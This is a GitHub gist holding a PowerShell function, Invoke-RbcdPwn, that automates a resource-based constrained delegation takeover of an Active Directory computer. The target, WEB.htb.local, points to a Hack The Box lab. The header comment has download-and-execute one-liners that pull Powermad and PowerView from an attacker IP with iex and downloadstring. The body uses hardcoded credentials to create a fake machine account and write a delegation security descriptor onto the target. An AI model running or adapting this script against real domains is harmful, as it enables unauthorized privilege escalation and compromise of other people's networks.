-
-
Save snovvcrash/81c8e151527bfd5e28c40ed77eb3c5ab to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-RbcdPwn { | |
| <# | |
| Make sure to import Powermad.ps1 and PowerView.ps1 before you begin: | |
| curl -L https://github.com/Kevin-Robertson/Powermad/raw/master/Powermad.ps1 > pm.ps1 | |
| iex(new-object net.webclient).downloadstring("http://10.14.14.37/pm.ps1") | |
| curl -L https://github.com/PowerShellMafia/PowerSploit/raw/dev/Recon/PowerView.ps1 > pv.ps1 | |
| iex(new-object net.webclient).downloadstring("http://10.14.14.37/pv.ps1") | |
| #> | |
| Param ( | |
| [Parameter(Mandatory = $true)] | |
| [String] | |
| $FakeMachine | |
| ) | |
| $TargetComputer = 'WEB.htb.local' | |
| $UserWithDaclUsername = 'htb.local\test-svc' | |
| $UserWithDaclPassword = ConvertTo-SecureString 'T3st-S3v!ce-F0r-Pr0d' -AsPlainText -Force | |
| $Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword) | |
| Write-Host "[*] Target computer to own: $TargetComputer" -ForegroundColor Green | |
| Write-Host "[*] Owned user account which has permissions to configure RBCD on target computer: $UserWithDaclUsername" -ForegroundColor Green | |
| Write-Host "[*] Verifying that the user indeed has all the necessary rights..." -ForegroundColor Green | |
| $AttackerSID = Get-DomainUser $UserWithDaclUsername.Substring($($UserWithDaclUsername.IndexOf('\')) + 1) -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid' | |
| $ACE = Get-DomainObjectACL $TargetComputer -Verbose -Credential $Cred | ?{$_.SecurityIdentifier -match $AttackerSID} | |
| Write-Host "[+] ACE:" -ForegroundColor Green | |
| Echo $ACE | |
| Write-Host "[*] Creating a new machine account with Powermad.ps1..." -ForegroundColor Green | |
| New-MachineAccount -MachineAccount $FakeMachine -Password $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force) -Verbose -Credential $Cred | |
| $ComputerSid = Get-DomainComputer $FakeMachine -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid' | |
| Write-Host "[*] New machine account SID: $ComputerSid" -ForegroundColor Green | |
| Write-Host "[*] Setting the msDS-AllowedToActOnBehalfOfOtherIdentity property on target computer..." -ForegroundColor Green | |
| $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" | |
| $SDBytes = New-Object byte[] ($SD.BinaryLength) | |
| $SD.GetBinaryForm($SDBytes, 0) | |
| Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $Cred | |
| Write-Host "[*] Confirming that the msDS-AllowedToActOnBehalfOfOtherIdentity property was set correctly..." -ForegroundColor Green | |
| $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred | Select -Expand 'msDS-AllowedToActOnBehalfOfOtherIdentity' | |
| $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 | |
| Write-Host "[+] Security descriptor:" -ForegroundColor Green | |
| Echo $Descriptor.DiscretionaryAcl | |
| # Clear the msDS-AllowedToActOnBehalfOfOtherIdentity property after you got your TGS with Rubeus: | |
| #Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment